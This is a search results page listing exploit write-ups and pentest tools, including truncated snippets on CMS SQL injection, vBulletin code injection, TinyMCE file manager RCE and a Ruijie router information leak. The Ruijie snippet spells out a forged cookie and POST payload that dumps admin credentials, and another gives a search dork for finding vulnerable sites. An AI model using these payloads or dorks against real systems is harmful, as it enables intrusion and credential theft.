7 matches found
HackBar - HackBar Plugin For Burpsuite
HackBar - HackBar Plugin For Burpsuite V1.0. Requirements Burpsuite Java How to Install Download Jar 'https://github.com/d3vilbug/HackBar/releases/tag/1.0' and add in burpsuite Tested on Burpsuite 1.7.36 Windows 10 xubuntu 18.04 Upcoming Features/Modules Ctrl + H shortcut WAF bypass SQLi...
Wowonder CMS - Privilege Escalation Vulnerability
Exploit for php platform in category web applications Today I will explain an exploit of Privilege Escalation in Wowonder CMS. First we need firefox v56.0.2 or earlier and then download hackbar: https://addons.mozilla.org/es/firefox/addon/hackbar/ Note: If the bar does not appear, press F9 to mak...
Mao10CMS /Application/Control/Controller/WeixinController.class.php SQL注入漏洞
/Application/Control/Controller/WeixinController.class.php if $tmpStr == $signature echo $echostr; $postStr = $GLOBALS"HTTPRAWPOSTDATA"; if !empty$postStr $postObj = simplexmlloadstring$postStr, 'SimpleXMLElement', LIBXMLNOCDATA; $fromUsername = $postObj-FromUserName; $toUsername =...
Ruijie Router NBR 信息泄漏漏洞
使用ModifyHeaders修改Cookie头为:auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;使用Hackbar发送POST包到:http://localhost/WEBVMS/LEVEL15/内容为:command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. 得到admin的帐号密码。 !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req fr...
vBulletin 4.x.x visitormessage.php Remote Code Injection Vulnerability
you can get access from vbulletin forum, just inject php code in one file. + My Homepage: black-hg.org / nasirpour.info + Discovered By: Dariush Nasirpour Net.Edit0r + Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds bhg...
11 Firefox Add-ons to Hack and PenTest
1. Tamper Data Tamper data is an great tool to to view and modify HTTP/HTTPS headers and post parameters. We can alter each request going from our machine to destination host with this. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XS...
TinyMCE Ajax File Manager Remote Code Execution
/ | / \ / / \ / /\ \ / / \ | \ / \ \ | | | | /\ /\ / /|| /\ | | || \ \ / / / / / Exploit Title : timynce Ajax File Manager Remote Code Author : By onestree Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/ tested : windows 7 Dork : inurl:"/plugins/filemanager/" or...